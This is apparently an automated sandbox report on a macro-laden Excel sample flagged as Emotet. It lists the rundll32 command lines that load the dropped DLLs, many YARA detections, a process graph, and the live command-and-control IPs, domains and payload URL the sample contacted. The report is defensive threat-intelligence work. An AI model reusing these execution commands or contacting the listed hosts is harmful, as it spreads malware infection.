Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: 80_513972285.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 17.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2890000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2280000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2340000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2280000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2170000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23f0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.440000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.6c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3190000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28c0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2160000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4f0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2340000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2950000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2890000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562424 Sample: 80_513972285.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->49 51 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 2->51 53 31 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 17 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\80_513972285.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.168, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 kuyporn.com 172.67.149.209, 49169, 80 CLOUDFLARENETUS United States 23->57 59 jeffreylubin.igclout.com 74.208.236.157, 49170, 80 ONEANDONE-ASBrauerstrasse48DE United States 23->59 45 C:\ProgramData\QWER.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\...\kcktqpyucuj.sda (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
207.148.81.119
 unknown United States
20473 AS-CHOOPAUS true
104.131.62.48
 unknown United States
14061 DIGITALOCEAN-ASNUS true
198.199.98.78
 unknown United States
14061 DIGITALOCEAN-ASNUS true
194.9.172.107
 unknown unknown
207992 FEELBFR true
59.148.253.194
 unknown Hong Kong
9269 HKBN-AS-APHongKongBroadbandNetworkLtdHK true
74.207.230.120
 unknown United States
63949 LINODE-APLinodeLLCUS true
103.41.204.169
 unknown Indonesia
58397 INFINYS-AS-IDPTInfinysSystemIndonesiaID true
85.214.67.203
 unknown Germany
6724 STRATOSTRATOAGDE true
191.252.103.16
 unknown Brazil
27715 LocawebServicosdeInternetSABR true
168.197.250.14
 unknown Argentina
264776 OmarAnselmoRipollTDCNETAR true
185.148.168.15
 unknown Germany
44780 EVERSCALE-ASDE true
66.42.57.149
 unknown United States
20473 AS-CHOOPAUS true
91.240.118.168
 unknown unknown
49453 GLOBALLAYERNL true
139.196.72.155
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd true
217.182.143.207
 unknown France
16276 OVHFR true
203.153.216.46
 unknown Indonesia
45291 SURF-IDPTSurfindoNetworkID true
159.69.237.188
 unknown Germany
24940 HETZNER-ASDE true
116.124.128.206
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
37.59.209.141
 unknown France
16276 OVHFR true
78.46.73.125
 unknown Germany
24940 HETZNER-ASDE true
210.57.209.142
 unknown Indonesia
38142 UNAIR-AS-IDUniversitasAirlanggaID true
172.67.149.209
 kuyporn.com United States
13335 CLOUDFLARENETUS true
185.148.168.220
 unknown Germany
44780 EVERSCALE-ASDE true
74.208.236.157
 jeffreylubin.igclout.com United States
8560 ONEANDONE-ASBrauerstrasse48DE false
54.37.228.122
 unknown France
16276 OVHFR true
185.168.130.138
 unknown Ukraine
49720 GIGACLOUD-ASUA true
190.90.233.66
 unknown Colombia
18678 INTERNEXASAESPCO true
142.4.219.173
 unknown Canada
16276 OVHFR true
54.38.242.185
 unknown France
16276 OVHFR true
195.154.146.35
 unknown France
12876 OnlineSASFR true
195.77.239.39
 unknown Spain
60493 FICOSA-ASES true
78.47.204.80
 unknown Germany
24940 HETZNER-ASDE true
118.98.72.86
 unknown Indonesia
7713 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID true
37.44.244.177
 unknown Germany
47583 AS-HOSTINGERLT true
62.171.178.147
 unknown United Kingdom
51167 CONTABODE true
128.199.192.135
 unknown United Kingdom
14061 DIGITALOCEAN-ASNUS true

Contacted Domains

Name IP Active
kuyporn.com 172.67.149.209 true
jeffreylubin.igclout.com 74.208.236.157 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://jeffreylubin.igclout.com/wp-admin/vzOG/ true
  • Avira URL Cloud: malware
 unknown
